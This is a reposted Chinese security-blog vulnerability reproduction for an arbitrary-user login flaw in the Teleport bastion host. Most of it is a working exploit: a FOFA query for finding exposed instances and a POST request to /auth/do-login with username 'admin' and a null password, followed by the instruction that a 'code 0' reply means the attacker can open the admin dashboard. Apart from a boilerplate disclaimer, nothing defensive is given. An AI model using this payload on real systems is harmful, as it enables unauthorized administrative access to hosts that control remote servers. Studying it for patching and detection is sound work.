Teleport堡垒机 do-login 任意用户登录漏洞

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 Teleport堡垒机 do-login 任意用户登录漏洞

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

Teleport是一款简单易用的开源堡垒机系统,具有小巧、易用的特点,支持RDP/SSH/SFTP/Telnet协议的远程连接和审计管理Teleport存在任意用户登录漏洞,攻击者通过漏洞可以获取业务后台权限。

图片[1]-Teleport堡垒机 do-login 任意用户登录漏洞-渗透云记 - 专注于网络安全与技术分享

0x03 漏洞复现

fofa:app=”TELEPORT堡垒机”

1.使用POC执行任意登录(验证码需一致)

post:
http://{{Hostname}}/auth/do-login
args={"type":2,"username":"admin","password":null,"captcha":"7hly","oath":"","remember":false}
图片[2]-Teleport堡垒机 do-login 任意用户登录漏洞-渗透云记 - 专注于网络安全与技术分享

2.返回code:0访问主页即可成功登录

/dashboard
图片[3]-Teleport堡垒机 do-login 任意用户登录漏洞-渗透云记 - 专注于网络安全与技术分享
© 版权声明
THE END
喜欢就支持一下吧
点赞6 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容